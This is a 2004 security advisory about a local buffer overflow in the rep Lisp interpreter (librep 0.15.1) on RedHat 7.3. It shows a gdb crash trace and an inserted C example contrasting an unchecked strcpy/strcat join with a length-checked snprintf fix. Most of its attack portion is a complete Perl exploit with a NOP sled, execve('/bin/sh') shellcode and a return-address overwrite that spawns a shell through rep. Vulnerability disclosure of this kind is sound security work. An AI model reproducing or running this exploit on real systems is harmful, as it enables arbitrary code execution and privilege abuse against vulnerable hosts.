[UNIX] Local Buffer Overflow in REP (Long ARG)

Type securityvulns
Reporter Securityvulns
Modified 2004-03-24T00:00:00


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com


Local Buffer Overflow in REP (Long ARG)


rep stands for "Read, Eval, Print", the three main components of any Lisp system. Librep is a dialect of Lisp, designed to be used both as an extension language for applications and as a general programming language. A buffer overflow in rep, triggered by an overlong command-line argument, allows a local user to execute arbitrary code with the privileges of the rep process. Note that rep is not normally installed setuid, so this only crosses a privilege boundary where rep, or another program linking librep, runs with privileges other than the invoking user's.


Vulnerable Systems:
 * RedHat Linux 7.3, kernel version 2.4.20 (prior versions might also be affected)
 * rep version 0.15.1

To exploit the vulnerability, simply pass as the first argument a buffer string of 4081 bytes:

 $ declare -x BADBUFFER=`perl -e '{print "A"x"4081"}'`
 $ rep $BADBUFFER
 Segmentation fault
 $ gdb rep
 (gdb) r $BADBUFFER
 Program received signal SIGSEGV, Segmentation fault.
 0x4003f3cd in Fexpand_file_name () from /usr/lib/librep.so.9
 (gdb) info reg esp
 esp            0xbf414139       0xbf414139

The faulting function, Fexpand_file_name, lives in the shared library librep.so.9 rather than in the rep binary itself, so the overlong argument is mishandled by library code that other callers of librep could reach as well. The value of esp at the crash is what the exploit below takes as its base return address.
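The bug class behind this crash, shown as an added example that is not librep's code: a fixed-size stack buffer filled from an argument whose length is never checked, beside a hardened form that measures first and refuses anything that does not fit. Everything here is assumed for illustration: the 4096-byte buffer (PATH_MAX on Linux; the advisory does not give librep's real size), the directory-plus-name join that a file-name expander would perform, and the function names. Whether a given argument length overflows depends on that size and on any prefix the routine adds, so the example demonstrates the boundary of its own layout rather than the advisory's 4081 bytes.

```c
/* Added example, not librep's code: vulnerable pattern vs. hardened form.
 * Assumed layout: NAME_BUF-byte stack buffer, dir + "/" + name join.
 * Build: cc -Wall -o expand expand.c && ./expand */
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define NAME_BUF 4096        /* assumed buffer size (PATH_MAX on Linux) */

/* Vulnerable pattern: unbounded strcpy/strcat into a stack buffer. Any
 * dir + "/" + name longer than NAME_BUF - 1 bytes writes past the end of
 * tmp, over whatever the compiler placed above it (saved registers, the
 * saved return address), which is how an argument turns into a SIGSEGV
 * or, with a crafted payload, a controlled return. Only ever called with
 * a short input here. */
static void expand_unsafe(const char *dir, const char *name, char *out)
{
    char tmp[NAME_BUF];
    strcpy(tmp, dir);
    strcat(tmp, "/");
    strcat(tmp, name);       /* the overflow happens here for a long name */
    strcpy(out, tmp);
}

/* How many bytes the unsafe join would write past tmp for a name of
 * namelen bytes: 0 means it fits. Pure arithmetic, no overflow is done. */
size_t overflow_bytes(const char *dir, size_t namelen)
{
    size_t need = strlen(dir) + 1 + namelen + 1;   /* dir, '/', name, NUL */
    return need > NAME_BUF ? need - NAME_BUF : 0;
}

/* Hardened form: measure first, reject early, and use a length-limited
 * formatter so even a miscounted length cannot write past outsz.
 * Returns 0 on success, -1 with errno set to ENAMETOOLONG otherwise. */
int expand_safe(const char *dir, const char *name, char *out, size_t outsz)
{
    size_t need = strlen(dir) + 1 + strlen(name) + 1;
    if (need > outsz) {
        errno = ENAMETOOLONG;
        return -1;
    }
    int n = snprintf(out, outsz, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= outsz) {   /* truncation is still a failure */
        errno = ENAMETOOLONG;
        return -1;
    }
    return 0;
}

/* Constructed test input: a name of n 'A' bytes, like the advisory's
 * perl one-liner, held in a static buffer. */
const char *long_name(size_t n)
{
    static char buf[8192];
    if (n >= sizeof buf) n = sizeof buf - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}

/* Run the hardened expander on an n-byte name with a NAME_BUF-sized
 * output buffer and return its result, so the check can be exercised. */
int try_expand(const char *dir, size_t n)
{
    char out[NAME_BUF];
    return expand_safe(dir, long_name(n), out, sizeof out);
}

int main(void)
{
    char out[NAME_BUF];
    expand_unsafe("/home/user", "file.jl", out);   /* short input: harmless */
    printf("unsafe, short name   : %s\n", out);
    printf("unsafe, 4096-byte name would spill %zu bytes past the buffer\n",
           overflow_bytes("/home/user", 4096));
    printf("safe,   4084-byte name: %d (fits exactly)\n", try_expand("/home/user", 4084));
    if (try_expand("/home/user", 4085) == -1)
        printf("safe,   4085-byte name: rejected (%s)\n", strerror(errno));
    return 0;
}
```

The length check is the actual fix; compiling the unsafe form with -fstack-protector would turn the overwrite into an abort rather than a controlled return, but it does not make the copy correct.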

Exploit Code:

#!/usr/bin/perl -w
#
# RedHat Linux 7.3 local Buffer Overflow in REP 0.15.1 exploit
#
# Legal notes :
#
# The BlackAngels staff refuse all responsibilities for an incorrect
# or illegal use of this code or for eventual damages to others systems.
#
# For more information:
# [ http://www.blackangels.it ] - ( staff[at]blackangels.it )

use strict;

# Total payload length, the base return address (esp at the crash in the
# gdb session above) and the NOP byte used for the sled.
my $len = 4260;
my $ret = 0xbf414139;
my $nop = "\x90";

print "\nRedHat Linux 7.3 local Buffer Overflow in REP 0.15.1 exploit";
print "\nVulnerable versions: RedHat Linux 7.3 with 2.4.20";
print "\n============================================================\n";

if (!defined $ARGV[0]) {
    print "You must specify an offset [ Default = -1000 ] ...\n\n";
    exit(-1);
}

my $offset = $ARGV[0];

# Linux/x86 execve("/bin/sh") shellcode (jmp/call trick to locate the string).
my $shellcode =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" .
    "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" .
    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" .
    "\xff\xff/bin/sh";

print "Trying to execute /bin/sh ...\n";

# Payload layout: NOP sled, then the shellcode, then the final 100 bytes
# filled with copies of the adjusted return address so that the overwritten
# saved return address lands on one of them and jumps into the sled.
my $buffer = "";
my $i;
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}

$buffer .= $shellcode;

print("\nAddress: 0x", sprintf('%lx', ($ret + $offset)), "\n");
print "\tRet: $ret + Offset: $offset\n\n";

# Little-endian 32-bit return address, repeated up to $len.
my $new_ret = pack('l', ($ret + $offset));
for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}

# Pass the payload as the first argument directly (list form, no shell),
# so no byte of the sled, shellcode or address is interpreted by a shell.
exec("/usr/bin/rep", $buffer);


The information has been provided by BlackAngels Staff (staff@blackangels.it).




DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.